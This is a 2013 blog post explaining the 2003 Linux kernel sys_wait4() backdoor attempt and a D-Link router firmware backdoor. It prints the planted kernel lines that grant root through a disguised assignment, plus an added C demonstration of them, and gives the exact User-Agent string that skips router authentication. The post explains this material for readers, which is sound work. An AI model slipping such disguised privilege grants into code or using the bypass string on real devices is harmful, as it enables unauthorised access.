Of backdoors and bad coding

    by Arjun Sreedharan

    Does "roodkcableoj28840ybtide" mean anything to you?
    By the time you have read through this article, you will understand that it is not exactly gibberish.

    The Tux

    Talking about backdoors, I’d like to write about an attempted planting of a backdoor in the Linux kernel.
    It was the year 2003, and the Linux kernel was still maintained on BitKeeper.

    The backdoor was just 2 lines added to the /kernel/exit.c file of the Linux kernel’s source code. They were added to the sys_wait4() system call.

    sys_wait4() is a function a process could use to wait until some other process finishes.

    It was presented as a bug fix: the new lines supposedly made sys_wait4() return the error “EINVAL” (the error code for invalid arguments) when the function was called in a way that was not permissible.

    The added lines were as follows:

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    	retval = -EINVAL;

    On casually reading the above code, it appears to check if the caller of sys_wait4() is using either of the __WCLONE or __WALL flags, and if the user invoking it has the uid 0 (i.e. the root user). If both conditions are true, the call is aborted with the given error code.

    If you re-examine the piece of code, you’ll find that instead of the equality operator ==, the assignment operator = is used. The code should have read current->uid == 0 instead of current->uid = 0.

    The above piece of code first compares options to the expression (__WCLONE|__WALL).
    If that is true, it then evaluates (current->uid = 0). The value of an assignment expression is the value assigned, here 0, so this always evaluates to false; at the same time, by virtue of the assignment operator, it sets current->uid to 0, giving root access to the system.

    So the if-statement always evaluates to false and the code is effectively:

    if ( options == ( __WCLONE | __WALL ) )
    	current->uid = 0;

    So the code never even checks whether the user is root. If the flag check succeeds, it grants the process root privileges, thereby turning sys_wait4() into a backdoor that hands out unlimited privileges on a machine just by passing the right flags.
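To make the evaluation concrete, here is a user-space model of the two planted lines next to the version the commit claimed to be. It is added here as an illustration and is not code from this post or from the kernel; the flag values are the ones Linux defines, while the task struct and the uid_after() helper are stand-ins.

```c
#include <errno.h>
#include <stdio.h>

/* Constructed user-space model of the planted sys_wait4() lines; not kernel
 * code. Flag values follow Linux's <linux/wait.h>; the task struct is a stub. */
#define __WALL   0x40000000
#define __WCLONE 0x80000000

struct task { unsigned int uid; };          /* stand-in for current->uid */

/* The two lines as planted: '=' where '==' was expected. The assignment
 * (current->uid = 0) evaluates to 0, so the && is always false, retval is
 * never set, and the caller's uid has been silently zeroed. The extra
 * parentheses are also what keep gcc's -Wparentheses from flagging it. */
static int wait4_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What the commit claimed to do: refuse the call for root, change nothing. */
static int wait4_intended(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

typedef int (*wait4_fn)(struct task *, unsigned int);
/* Demo helper (constructed): the uid left behind after one call. */
static unsigned int uid_after(wait4_fn fn, unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    fn(&t, options);
    return t.uid;
}

int main(void)
{
    printf("backdoored, uid 1000 -> %u\n", uid_after(wait4_backdoored, 1000, __WCLONE|__WALL)); /* 0 */
    printf("intended,   uid 1000 -> %u\n", uid_after(wait4_intended, 1000, __WCLONE|__WALL));   /* 1000 */
    printf("backdoored, __WALL only -> %u\n", uid_after(wait4_backdoored, 1000, __WALL));       /* 1000 */
    return 0;
}
```

Compile it with -Wall and notice that no warning appears: the parentheses around the assignment are exactly what silence the compiler's usual hint, which is why this kind of change needs a human reviewer.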

    Now that I think about this, I frequently make the mistake of using the = operator instead of the == operator. Perhaps I may have written some good backdoors by now. Who knows!!

    D-Link Router

    Just a month ago, a security whiz named Chris Heffner exposed a backdoor contained in certain versions of D-Link router firmware. He found that the firmware performs a strcmp between the User-Agent header of the HTTP request and the string xmlset_roodkcableoj28840ybtide. If the strings match, the login-checking function call is skipped and the authentication function returns 1 (meaning authentication OK).

    This means that if you set your browser’s User-Agent to xmlset_roodkcableoj28840ybtide, you can access the web interface without any authentication ;)

    If you look carefully at the string that facilitates the backdoor entry, it’s basically xmlset_ prepended to the following, written backwards:

    "Edit by 04882 Joel Backdoor"

    Did I not tell you that you would get to know what roodkcableoj28840ybtide means!!!

    Hardwired passwords were a design blunder three decades ago, but some Joel guy had to go home early from the office and decided to make life convenient.

    PS: Hot news: the United States NSA asked Linus Torvalds to inject backdoors into Linux/GNU.
    PS 2: It was never revealed who was behind the 2003 attempt to plant a backdoor in the Linux kernel.

    Disclaimer: The views expressed here are solely those of the author in his private capacity and do not in any way represent the views of the author's employer or any organization associated with the author.

Arjun Sreedharan 2013